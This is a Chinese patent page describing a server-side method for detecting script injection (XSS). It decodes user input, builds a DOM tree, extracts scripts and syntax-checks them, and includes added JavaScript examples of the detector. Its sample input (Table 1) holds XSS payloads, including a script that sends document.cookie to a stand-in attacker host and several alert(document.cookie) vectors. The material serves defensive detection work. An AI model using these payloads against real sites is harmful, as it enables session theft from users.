CN101459548A - Script injection attack detection method and system (Google Patents)

Info

Publication number: CN101459548A
Authority: CN (China)
Prior art keywords: script, object model, document object, user input, input data
Legal status: Granted
Application number: CNA2007101795383A
Other languages: Chinese (zh)
Other versions: CN101459548B (en)
Inventors: 叶润国, 胡振宇, 骆拥政, 朱钱航, 邓伟, 李博
Current assignee: Beijing Venus Information Technology Co Ltd
Original assignee: Beijing Venus Information Technology Co Ltd
Application filed by Beijing Venus Information Technology Co Ltd
Priority application: CN2007101795383A
Publication: CN101459548A (this document); granted as CN101459548B
Current legal status: Expired - Fee Related

Abstract

A script injection attack detection method and system belong to the technical field of computer networks. The method comprises obtaining an HTTP request, extracting user input data from the HTTP request, performing script injection attack detection on the user input data, and raising a script injection attack event alarm. The script injection attack detection step on the user input data comprises decoding the user input data, analysing the Document Object Model (DOM) structure, extracting scripts from the DOM and checking script syntax. The system comprises an HTTP request acquisition module, a user input data extraction module, a script injection attack detection module and a script injection attack alarm module; the detection module comprises a user input data decoding module, a DOM structure analysis module, an injection script extraction module and a script syntax checking module. The method and system are suitable for use in Web service security products.

Description

Script injection attack detection method and system
Technical field
The present invention relates to a script injection attack detection method and system and belongs to the technical field of computer networks.
Background art
Since the birth of Web technology the Internet has developed rapidly, and Web services have become the dominant way of presenting content on today's Internet. As Web technology evolved, the Web stopped being a provider of static content only and began to offer dynamic content tailored to the user's needs. Because Web services are easy to deploy and easy to use, many traditional client/server applications are being migrated to Web-based applications, including applications with very high security requirements such as electronic banking and electronic securities trading.
Web services, while making people's lives and work more convenient, have also brought many security problems. These include attacks that threaten the Web server, such as SQL injection, execution of suspicious files and unauthorized object access, and attacks that threaten Web clients, such as script injection attacks. According to 2007 statistics from the international open Web security organization OWASP, script injection attacks (which include cross-site scripting attacks, a subcategory of script injection) ranked first among the ten major Web security incident classes. Statistics on script injection incidents in the international vulnerability database CVE from 2002 to 2007 show that the frequency of script injection security incidents is growing year by year.
Script injection attacks originate from a defect in the Web server application code: it fails to strictly check and filter user input data, so that a malicious attacker can inject malicious script through a user input field. The injected script is reflected by the Web server to the victim's Web browser and executed there, which lets the attacker steal the victim's sensitive data or perform malicious actions in the victim's security context.
Since script injection attacks were discovered, research on detecting and defending against them has been carried out. This research can be divided into two classes: Web-server-side and Web-client-side detection and defence. Server-side detection and defence methods mainly comprise content security encoding and HTML tag filtering. Content security encoding encodes user input data uniformly as text so that the Web client does not interpret the text entered by the user as HTML-formatted data; this must be considered during development of the Web application, and many Web application developers lack experience in this respect. HTML tag filtering means filtering the sensitive tags present in user input data, either in the Web application code or in a security gateway deployed in front of the Web server; this method suffers from filtering that is not strict enough or filtering rules that are easy to evade. Client-side detection and defence methods mainly comprise script execution prohibition, HTTP response purification and client data flow tracking. Script execution prohibition completely or partially forbids script execution in the Web client, which prevents some Web content from rendering correctly. HTTP response purification filters the Web page content returned by the Web server to remove scripts that may endanger client security; its disadvantage is that the cleaning may be incomplete, or so aggressive that the page content no longer renders correctly. Client data flow tracking comprises static data flow tracking at the source code level and trace analysis of input and output data streams; it requires modifying the Web client software and is difficult to deploy and costly in performance.
Summary of the invention
The present invention provides a script injection attack detection method and system. They belong to the Web-server-side class of solutions and retain the deployment and implementation advantages of server-side script injection attack detection methods and systems, while using user input data decoding, Document Object Model (DOM) analysis, DOM script extraction and script syntax checking to overcome the high false-negative rate of traditional server-side script injection attack detection methods and systems, greatly improving their detection accuracy.
The technical solution adopted by the present invention to solve the technical problem is as follows:
A script injection attack detection method comprises:
a step of obtaining an HTTP request;
a step of extracting user input data from the HTTP request;
a step of performing script injection attack detection on the user input data;
a step of raising a script injection attack event alarm;
wherein the step of performing script injection attack detection on the user input data comprises:
a step of decoding the user input data;
a step of Document Object Model structure analysis;
a step of extracting scripts from the document object model tree and checking the syntax of the extracted scripts;
and a script injection attack alarm is raised as soon as at least one syntactically correct script has been extracted from the user input data.
Preferably, the user input data decoding step of the script injection attack detection method comprises a decoding step based on the HTTP encoding standard and a decoding step based on the HTML encoding standard.
Preferably, the Document Object Model structure analysis step of the script injection attack detection method treats the decoded user input data as a fragment of HTML-formatted content and converts it, according to the HTML Document Object Model standard, into a document object model tree that conforms to the HTML DOM.
Preferably, the scripts extracted from the document object model tree by the script injection attack detection method comprise JavaScript scripts and VBScript scripts.
Preferably, the step of extracting scripts from the document object model tree in the script injection attack detection method is any combination of the following five script extraction methods:
A) extracting JavaScript/VBScript scripts from each <script> tag in the document object model tree;
B) extracting JavaScript/VBScript scripts from the event handler attributes of each HTML tag in the document object model tree;
C) extracting JavaScript/VBScript scripts from particular attribute values of each HTML tag in the document object model tree;
D) extracting JavaScript/VBScript scripts from the CSS defined by each <style> tag in the document object model tree;
E) extracting JavaScript/VBScript scripts from the CSS introduced by the style attribute of each HTML tag in the document object model tree.
Preferably, the step of checking the syntax of the extracted scripts in the script injection attack detection method is: if the extracted script is JavaScript, its syntax is checked against the standard JavaScript grammar; if the extracted script is VBScript, its syntax is checked against the standard VBScript grammar.
A script injection attack detection system comprises:
an HTTP request acquisition module for obtaining the HTTP request message to be inspected;
a user input data extraction module for extracting user input data from the obtained HTTP request message;
a script injection attack detection module for performing script injection attack detection on the extracted user input data;
a script injection attack alarm module for generating a script injection attack event and notifying the security administrator;
wherein the script injection attack detection module comprises:
a user input data decoding module that receives the user input data and decodes it according to the HTTP encoding standard and the HTML encoding standard;
a Document Object Model structure analysis module that receives the decoded data output by the user input data decoding module and constructs the corresponding document object model tree according to the HTML DOM standard;
an injection script extraction module that receives the document object model tree output by the DOM structure analysis module and extracts from it all possible JavaScript/VBScript scripts;
a script syntax checking module that receives the JavaScript/VBScript scripts extracted by the injection script extraction module, analyses their syntactic correctness according to the JavaScript/VBScript grammar, and raises a script injection attack alarm as soon as at least one syntactically correct JavaScript/VBScript script has been extracted from the HTTP request.
The sub-modules of the script injection attack detection module are connected as follows: the user input data decoding module receives the user input data extracted by the user input data extraction module, decodes it and passes the decoded user input data to the DOM structure analysis module; the DOM structure analysis module receives the decoded user input data output by the decoding module, constructs the corresponding document object model tree according to the HTML DOM standard and passes it to the injection script extraction module; the injection script extraction module receives the document object model tree output by the DOM structure analysis module and extracts from it all possible injection scripts; the script syntax checking module receives the injection scripts extracted by the injection script extraction module, analyses their syntactic correctness according to the script grammar and, as soon as at least one syntactically correct injection script has been extracted from the HTTP request, raises a script injection attack alarm and passes it to the script injection attack alarm module; the script injection attack alarm module receives the alarm from the script syntax checking module, constructs a script injection attack event alarm and sends it to the alarm management platform.
Preferably, when the script injection attack detection system raises a script injection attack alarm, it uses the whole HTTP request message as the alarm content of the script injection attack event.
Beneficial effects of the present invention: the invention retains the deployment and implementation advantages of server-side script injection attack detection methods and systems; it decodes user input data with HTTP decoding and HTML decoding, which effectively defeats the common evasion techniques used by attackers; it performs DOM structure analysis on the decoded user input data to build a document object model tree and traverses every HTML tag of that tree to comprehensively extract any injection script that may be present; and it checks the syntax of each extracted script with a script syntax checking engine, raising a script injection attack alarm event only when at least one syntactically correct script is detected. Compared with traditional server-side script injection attack detection methods, the method of the present invention greatly improves the comprehensiveness and accuracy of server-side script injection attack detection.
Description of drawings
Fig. 1 is the script injection attack detection flow of the present invention;
Fig. 2 shows the user input data extracted from an HTTP request message;
Fig. 3 is an embodiment of the document object model tree converted from user input data;
Fig. 4 is the flow chart of the injection script syntax check of the present invention;
Fig. 5 is the module structure diagram of the script injection attack detection system of the present invention.
The present invention is further described below with reference to the drawings and embodiments.
Embodiment
As shown in Fig. 1, the script injection attack detection method of the present invention comprises the steps of obtaining the HTTP request message (101), extracting user input data from the HTTP request (102), decoding the user input data (103), performing DOM structure analysis on the decoded user input data (104), comprehensively extracting injection scripts from the document object model tree (105), checking the syntactic correctness of the extracted injection scripts (106) and generating a script injection attack alarm event (107).
The HTTP request message acquisition step 101 of the present invention includes, but is not limited to, the following three modes:
1) HTTP proxy mode;
2) Web server embedded mode;
3) passive acquisition mode.
HTTP request acquisition based on an HTTP proxy comprises: 1) deploying a client-side HTTP proxy at the edge of the Web user's network to intercept all HTTP request messages sent to Web servers; 2) deploying an HTTP proxy on the Web server side to intercept all HTTP requests sent to the Web server it protects.
The Web server embedded mode means obtaining all HTTP request messages that a particular Web server software is about to process by adding a third-party plug-in module to that software. For example, for the Apache server a third-party plug-in can be developed against Apache's public API that scans each HTTP request to determine whether it is a script injection attack before Apache formally processes the request; for Microsoft's Internet Information Server (IIS), a filter plug-in that intercepts and inspects HTTP request messages can be written against its public filter plug-in API.
Passive acquisition of HTTP request messages means passively collecting all HTTP-related network packets on the local network, or all HTTP-related packets flowing through a monitoring device, and recovering the HTTP request messages through IP fragment reassembly, TCP stream reassembly and HTTP protocol analysis. This passive mode of obtaining HTTP request messages is well suited to intrusion detection system (IDS) and intrusion prevention system (IPS) products.
After the HTTP request message has been obtained, the next step is to extract all user input data from it. As shown in Fig. 2, the script injection attack detection method of the present invention extracts the following four protocol fields of the HTTP request message 200 when extracting user input data: URL parameters 210, Cookie values 220, Referer values 230 and form data 240.
After the user input data has been extracted from the specified protocol fields of the HTTP request message, it is decoded. First, each protocol field is split into name-value pairs according to the encoding rule of that field. The URL parameter field is encoded as a string of name-value pairs separated by the '&' character, for example Name1=VAL1&Name2=VAL2; the string is first split on '&' and each part is then split on '=', yielding the user input values VAL1 and VAL2. The Cookie field is encoded essentially like the URL parameter field, except that its name-value pairs are separated by ';' rather than '&'. The Referer field and the form data follow the same basic encoding rule as URL parameters, so user input values are extracted from them in the same way.
After the user input data has been extracted from each specified protocol field of the HTTP request message, the user input data decoding step is performed. Decoding of user input data here comprises decoding according to the HTTP (URL) encoding standard and decoding according to the HTML encoding standard.
Under the HTTP encoding standard a space is encoded as '+', and other non-displayable characters or characters with special meaning are encoded as '%XX', XX being the hexadecimal code of the character; for example, '=' is encoded as '%3D'. HTTP decoding therefore replaces each '+' in the user input data with a space character (hexadecimal 0x20) and each '%XX' with the single-byte character of value 0xXX.
Under the HTML encoding standard a character with special meaning may be encoded in any of three ways: named (friendly) encoding, decimal encoding and hexadecimal encoding. For example, the double quote character is encoded as '&quot;' in named form, and the single quote character is encoded as '&#39;' in decimal form and as '&#x27;' in hexadecimal form. HTML decoding therefore maps each such encoded sequence back to its original character.
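As an added worked example (not code from the patent or from its assignee), the following JavaScript for Node.js carries out the extraction and decoding steps described above over a constructed HTTP request: it pulls the four protocol fields (URL parameters, Cookie, Referer query string and urlencoded form body), splits each into name-value pairs with the separators given above, and applies HTTP decoding ('+' and '%XX') followed by HTML entity decoding (named, decimal and hexadecimal forms). The request text, the field labels and all helper names are assumptions made for the demonstration; the sample request is constructed, not captured traffic.

```javascript
// Added example: user-input extraction and two-layer decoding of an HTTP request.
// Not the patent's code; request text, field labels and helper names are assumptions.

const NAMED_ENTITIES = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };

// HTML decoding: named (&quot;), decimal (&#39;) and hexadecimal (&#x27;) forms.
// Sequences that are not recognised are left untouched.
function htmlDecode(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const ch = NAMED_ENTITIES[body.toLowerCase()];
    return ch === undefined ? match : ch;
  });
}

// HTTP decoding: '+' becomes a space and '%XX' becomes the byte 0xXX.
// decodeURIComponent additionally joins multi-byte UTF-8 sequences; on input
// that is not valid UTF-8 it throws, and we fall back to byte-wise decoding.
function httpDecode(s) {
  const plus = s.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(plus);
  } catch (e) {
    return plus.replace(/%([0-9a-f]{2})/gi, (m, h) => String.fromCharCode(parseInt(h, 16)));
  }
}

// Splits "name=value<sep>name=value" and returns the (still encoded) values.
function pairValues(field, sep) {
  return field.split(sep)
    .map(p => p.trim())
    .filter(p => p.length > 0)
    .map(p => (p.indexOf('=') < 0 ? p : p.slice(p.indexOf('=') + 1)));
}

// Minimal split of a raw HTTP/1.1 request into request line, headers and body.
function parseRequest(raw) {
  const [head, body = ''] = raw.split('\r\n\r\n');
  const lines = head.split('\r\n');
  const [method, target] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, headers, body };
}

function queryOf(url) {
  const i = url.indexOf('?');
  return i < 0 ? '' : url.slice(i + 1);
}

// The four fields of the patent: URL parameters ('&'), Cookie (';'), Referer
// query string ('&') and urlencoded form body ('&'). Every value is HTTP-decoded
// first and HTML-decoded second, in that order.
function extractUserInput(raw) {
  const req = parseRequest(raw);
  const isForm = (req.headers['content-type'] || '').includes('application/x-www-form-urlencoded');
  const fields = [
    ['url', pairValues(queryOf(req.target), '&')],
    ['cookie', pairValues(req.headers['cookie'] || '', ';')],
    ['referer', pairValues(queryOf(req.headers['referer'] || ''), '&')],
    ['form', pairValues(isForm ? req.body : '', '&')],
  ];
  const out = [];
  for (const [field, values] of fields) {
    for (const v of values) out.push({ field, decoded: htmlDecode(httpDecode(v)) });
  }
  return out;
}

// Constructed sample request (not captured traffic): the q parameter and the
// Referer carry percent-encoded payloads whose quotes are also entity-encoded.
const SAMPLE_REQUEST =
  'POST /search?q=%3Cscript%3Ealert(%26quot%3Bxss%26quot%3B)%3C/script%3E&page=2 HTTP/1.1\r\n' +
  'Host: www.example.com\r\n' +
  'Cookie: session=abc123; theme=dark\r\n' +
  'Referer: http://www.example.com/index?name=%3Cimg+src%3Dx+onerror%3D%26%2339%3Balert(1)%26%2339%3B%3E\r\n' +
  'Content-Type: application/x-www-form-urlencoded\r\n' +
  '\r\n' +
  'comment=Hello%2C+how+are+you%3F&color=%23FF0000';

for (const item of extractUserInput(SAMPLE_REQUEST)) {
  console.log(`${item.field}: ${item.decoded}`);
}
```

Two details matter for a detector. The order is fixed: percent-decoding must run before entity decoding, because the entity text itself arrives percent-encoded (the '&' of '&quot;' is '%26' on the wire); running the two layers in the other order leaves '&quot;' in place and the later HTML analysis sees a different string from the one the browser would build. And decodeURIComponent is stricter than the single-byte rule in the text: it rejects sequences that are not valid UTF-8, so the byte-wise fallback keeps such inputs from escaping analysis by being undecodable.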
After the HTTP decoding and HTML decoding of the user input data have been completed, DOM structure analysis is performed on the decoded user input data. The whole decoded user input data is regarded as a fragment of HTML-formatted data and converted into a document object model tree using the standard HTML DOM structure analysis method. Fig. 3 shows an embodiment of the document object model tree obtained by converting the user input data of Table 1.
Table 1: example of decoded user input data
'><style>A{star:expression(onmouseover=function(){this.style.backgroundColor="#FF0000";},
onmouseout=function(){this.style.backgroundColor="#FFFFFF";})}</style>
<div align>
<font size=5 style="width:expression(alert(document.cookie))" onmouseover="alert(123)">
<A href="javascript:alert(document.cookie)">please click me</A>Hello.how are you?
<script type="text/Javascript">
var img=new Image();img.src='http://hackers.com/'+document.cookie;
</script>
</font>
</div>
In Fig. 3 the converted DOM structure is a tree in which the Root node 300 represents the empty root node; the Text1 node 301 represents a plain text node whose text data is "'"; the Style node 302 represents a <style> tag whose defined CSS is held by its child node Text4 304; the DIV node 303 represents a <div> tag; the Font node 305 represents a <font> tag, and the injection script introduced by its style attribute value is also stored in this node; the Anchor node 306 represents an <a> tag and holds the injection script introduced by its href attribute; the Text2 node 307 represents a plain text node whose text is "Hello.how are you?"; and the Script node 308 represents a <script> tag whose directly embedded JavaScript is held in the text content of its child node Text3 309.
After the decoded user input data has been converted into a document object model tree, the step of extracting injection scripts from the tree is performed. Every HTML tag in the whole document object model tree is traversed so that all possible injection scripts are extracted comprehensively.
The step of extracting injection scripts from the document object model tree in the present invention is any combination of the following five script extraction methods:
A) extracting JavaScript/VBScript scripts from each <script> tag in the document object model tree; for example, the JavaScript injection script introduced by the Script node 308 in Fig. 3 is the text content of its child node Text3 309;
B) extracting JavaScript/VBScript scripts from the event handler attributes of each HTML tag in the document object model tree; for example, the injection script introduced by the onmouseover event handler of the Font node 305 in Fig. 3;
C) extracting JavaScript/VBScript scripts from particular attribute values of each HTML tag in the document object model tree; for example, the Anchor node 306 in Fig. 3, whose href attribute introduces an injection script through the javascript: prefix;
D) extracting JavaScript/VBScript scripts from the CSS defined by each <style> tag in the document object model tree; for example, the Style node 302 in Fig. 3, whose CSS is stored in the text content of its child node Text4 304;
E) extracting JavaScript/VBScript scripts from the CSS introduced by the style attribute of each HTML tag in the document object model tree; for example, the Font node 305 in Fig. 3 introduces an injection script through expression() in the CSS defined by its style attribute.
After the injection scripts have been extracted from the document object model tree, their syntactic correctness is checked. The script injection attack detection method of the present invention supports syntax checking of both JavaScript and VBScript injection scripts: if the extracted script is JavaScript, its syntax is checked against the standard JavaScript grammar; if the extracted script is VBScript, its syntax is checked against the standard VBScript grammar.
Fig. 4 is the flow chart used by the present invention to check the syntactic correctness of the extracted injection scripts. Taking a JavaScript injection script as an example: first, the lexical analysis rules 401 for JavaScript are defined according to the JavaScript lexical specification, and a lexical analyser is generated from rules 401 by a lexical analyser generator; the generator may be the GNU flex tool or another tool. Next, the JavaScript parsing rules 402 are defined according to the JavaScript grammar specification, and a parser is generated from rules 402 by a parser generator; the generator may be the GNU yacc/bison tool or another tool. During the JavaScript syntax check, each JavaScript script 403 extracted from the document object model tree is first passed through the lexical analyser 404, producing a sequence of lexical tokens; these tokens are then fed to the parser 405, which performs the syntactic correctness analysis. The syntax check of VBScript scripts extracted from the document object model tree follows the same workflow as for JavaScript; only the lexical analysis rules and parsing rules of VBScript differ.
Among all injection scripts extracted from the document object model tree, if at least one passes the parser's syntactic correctness check, a script injection attack event alarm is triggered.
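As an added worked example covering the extraction methods A) to E) and the syntax check step above (not code from the patent or from its assignee), the following JavaScript for Node.js takes decoded user input, scans it for tags and raw <script>/<style> bodies, collects the candidate scripts from the five locations, and checks each candidate's JavaScript syntax by compiling it with the Function constructor, which parses a function body without executing it. Assumptions: a flat tag scan stands in for the full document object model tree (the five sources are the same), only the JavaScript branch is implemented (the patent's VBScript branch would need its own grammar), and the set of URL-carrying attributes and all helper names are choices made for the example. The input is the decoded user input of Table 1.

```javascript
// Added example: script extraction from decoded user input (methods A to E) and
// JavaScript syntax checking. Not the patent's code; a flat tag scan stands in
// for the DOM tree, VBScript is not handled, and the URL-attribute set and
// helper names are assumptions.

const EVENT_ATTR = /^on[a-z]+$/i;                                   // onmouseover, onclick, ...
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction']);  // attributes that accept javascript: URLs
// One attribute: name, optionally = "double-quoted" | 'single-quoted' | unquoted value.
const ATTR_RE = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
// Either a raw-text element (<script>/<style> with its body) or any other start tag.
// Limitation: an attribute value containing '>' is not handled; a real HTML parser would be.
const TAG_RE = /<(script|style)\b([^>]*)>([\s\S]*?)<\/\1\s*>|<([a-z][\w:-]*)\b([^>]*?)\/?>/gi;

function parseAttrs(s) {
  const attrs = {};
  for (const m of s.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Returns the argument text of each CSS expression(...) call, honouring nested parentheses.
function cssExpressions(css) {
  const out = [];
  const re = /expression\s*\(/gi;
  let m;
  while ((m = re.exec(css)) !== null) {
    let depth = 1;
    let i = re.lastIndex;
    while (i < css.length && depth > 0) {
      if (css[i] === '(') depth++;
      else if (css[i] === ')') depth--;
      i++;
    }
    if (depth === 0) out.push(css.slice(re.lastIndex, i - 1));
    re.lastIndex = i;
  }
  return out;
}

// Extraction methods A to E of the patent over a flat scan of the decoded input.
function extractScripts(html) {
  const found = [];
  for (const m of html.matchAll(TAG_RE)) {
    if (m[1] !== undefined) {                                                   // raw-text element
      if (m[1].toLowerCase() === 'script') {
        found.push({ source: 'A:script', code: m[3] });                         // A) <script> body
      } else {
        for (const e of cssExpressions(m[3])) found.push({ source: 'D:style', code: e }); // D) <style> CSS
      }
      continue;
    }
    const tag = m[4].toLowerCase();
    for (const [name, value] of Object.entries(parseAttrs(m[5]))) {
      if (EVENT_ATTR.test(name)) {
        found.push({ source: `B:${tag}@${name}`, code: value });                // B) event handler
      } else if (URL_ATTRS.has(name) && /^\s*javascript:/i.test(value)) {
        found.push({ source: `C:${tag}@${name}`, code: value.replace(/^\s*javascript:/i, '') }); // C) javascript: URL
      } else if (name === 'style') {
        for (const e of cssExpressions(value)) found.push({ source: `E:${tag}@style`, code: e }); // E) style attribute CSS
      }
    }
  }
  return found;
}

// Syntax check: the Function constructor parses the text as a function body
// without running it, so a SyntaxError means "not JavaScript". Empty text is
// not counted as a script.
function isValidJavaScript(code) {
  if (code.trim().length === 0) return false;
  try {
    new Function(code);
    return true;
  } catch (e) {
    return false;
  }
}

// Alarm rule of the patent: at least one extracted script that parses.
function detect(decodedInput) {
  const scripts = extractScripts(decodedInput).map(s => ({ ...s, valid: isValidJavaScript(s.code) }));
  return { alarm: scripts.some(s => s.valid), scripts };
}

// Decoded user input of Table 1 (the page's own sample), used as input here.
const TABLE1 = `'><style>A{star:expression(onmouseover=function(){this.style.backgroundColor="#FF0000";},
onmouseout=function(){this.style.backgroundColor="#FFFFFF";})}</style>
<div align>
<font size=5 style="width:expression(alert(document.cookie))" onmouseover="alert(123)">
<A href="javascript:alert(document.cookie)">please click me</A>Hello.how are you?
<script type="text/Javascript">
var img=new Image();img.src='http://hackers.com/'+document.cookie;
</script>
</font>
</div>`;

const result = detect(TABLE1);
console.log('alarm:', result.alarm);
for (const s of result.scripts) console.log(`${s.valid ? 'VALID  ' : 'invalid'} ${s.source}: ${s.code.trim()}`);
```

On Table 1 the scan yields five candidates (style tag CSS, font style attribute, font onmouseover, anchor href, script body) and every one parses, so the alarm fires; plain text such as "please click me" is never a candidate, and an event handler whose value is not JavaScript is extracted but rejected by the parser, which is the false-positive reduction the syntax step buys. Compiling attacker-controlled text in the detector's own engine is acceptable for a demonstration only; a production detector should use a standalone parser, as the patent does with a generated lexer and parser, so that the inspection engine is separate from anything that can run code.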
In particular, when the script injection attack alarm event is constructed, the whole HTTP request message can be included in the detail field of the alarm event so that the complete scene of the script injection attack is preserved.
As shown in Fig. 5, the script injection attack detection system of the present invention comprises an HTTP request acquisition module 510, a user input data extraction module 520, a script injection attack detection module 530 and a script injection attack alarm module 540; the script injection attack detection module 530 comprises a user input data decoding module 531, a DOM analysis module 532, an injection script extraction module 533 and a script syntax checking module 534.
The user input data decoding module 531 receives the user input data output by the user input data extraction module 520 and decodes it according to the HTTP encoding standard and the HTML encoding standard; the DOM analysis module 532 receives the decoded data output by the decoding module 531 and constructs the corresponding document object model tree according to the HTML DOM standard; the injection script extraction module 533 receives the document object model tree output by the DOM analysis module 532 and extracts from it all possible JavaScript/VBScript scripts; the script syntax checking module 534 receives the JavaScript/VBScript scripts extracted by the injection script extraction module 533 and analyses their syntactic correctness according to the JavaScript/VBScript grammar and the syntax check flow shown in Fig. 4. As soon as at least one syntactically correct JavaScript/VBScript script has been extracted from the HTTP request message, a script injection attack alarm is raised.
The script injection attack alarm module 540 constructs a script injection attack alarm event from the detection result of the script injection attack detection module 530. In particular, when the alarm event is constructed, the whole HTTP request message is used as the alarm content of the script injection attack event so that the complete scene of the attack is preserved.

Claims (8)

1. A script injection attack detection method, comprising the steps of acquiring an HTTP request, extracting user input data from the HTTP request, performing script injection attack detection on the user input data, and raising a script injection attack event alarm, characterized in that: the step of performing script injection attack detection on the user input data comprises decoding the user input data, analysing the document object model structure, extracting scripts from the document object model tree, and performing syntax checking on the extracted scripts, and a script injection attack alarm is raised as long as at least one syntactically correct script segment is extracted from the user input data.
2. The script injection attack detection method according to claim 1, characterized in that the user input data decoding step comprises a decoding step based on the HTTP encoding rules and a decoding step based on the HTML encoding rules.
3. The script injection attack detection method according to claim 1, characterized in that the document object model structure analysis step is: the decoded user input data is treated as a fragment of HTML-formatted content and is converted, according to the HTML document object model standard, into a document object model tree conforming to the HTML document object model.
4. The script injection attack detection method according to claim 1, characterized in that the scripts extracted from the document object model tree comprise JavaScript scripts and VBScript scripts.
5. The script injection attack detection method according to claim 1, characterized in that the step of extracting scripts from the document object model tree is any combination of the following five script extraction methods:
1) extracting JavaScript/VBScript script from each <script> tag in the document object model tree;
2) extracting JavaScript/VBScript script from the event-driven functions (event handler attributes) of each HTML tag in the document object model tree;
3) extracting JavaScript/VBScript script from the specific attribute values of each HTML tag in the document object model tree;
4) extracting JavaScript/VBScript script from the CSS defined in each <STYLE> tag in the document object model tree;
5) extracting JavaScript/VBScript script from the CSS introduced by the Style attribute of each HTML tag in the document object model tree.
6. The script injection attack detection method according to claim 1, characterized in that the step of performing syntax checking on the extracted script is: if the extracted script is a JavaScript script, the extracted JavaScript script is syntax-checked against the standard JavaScript syntax specification; if the extracted script is of type VBScript, the extracted VBScript script is syntax-checked against the standard VBScript syntax specification.
7. A script injection attack detection system, comprising an HTTP request acquisition module, a user input data extraction module, a script injection attack detection module and a script injection attack alarm module, characterized in that the script injection attack detection module comprises:
a user input data decoding module, which receives the user input data output by the user input data extraction module and decodes it according to the HTTP encoding rules and the HTML encoding rules;
a document object model structure analysis module, which receives the decoded data output by the user input data decoding module and constructs the corresponding document object model tree according to the HTML document object model standard;
an injection script extraction module, which receives the document object model tree output by the document object model structure analysis module and extracts all possible JavaScript/VBScript scripts from it;
a script syntax checking module, which receives the JavaScript/VBScript scripts extracted by the document object model script extraction module and analyses their syntactic correctness according to the JavaScript/VBScript syntax specification, raising a script injection attack alarm as long as at least one syntactically correct JavaScript/VBScript script segment is extracted from the HTTP request.
8. The script injection attack detection system according to claim 7, characterized in that, when the script injection attack alarm is raised, the whole HTTP request message is used as the alarm content of the script injection attack event.
CN2007101795383A 2007-12-14 2007-12-14 Script injection attack detection method and system Expired - Fee Related CN101459548B (en)


Publications (2)

Publication Number Publication Date
CN101459548A (en) 2009-06-17
CN101459548B (en) 2011-10-12


Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
C14 Grant of patent or utility model
GR01 Patent grant
CF01 Termination of patent right due to non-payment of annual fee
CF01 Termination of patent right due to non-payment of annual fee

Granted publication date: 20111012

Termination date: 20161214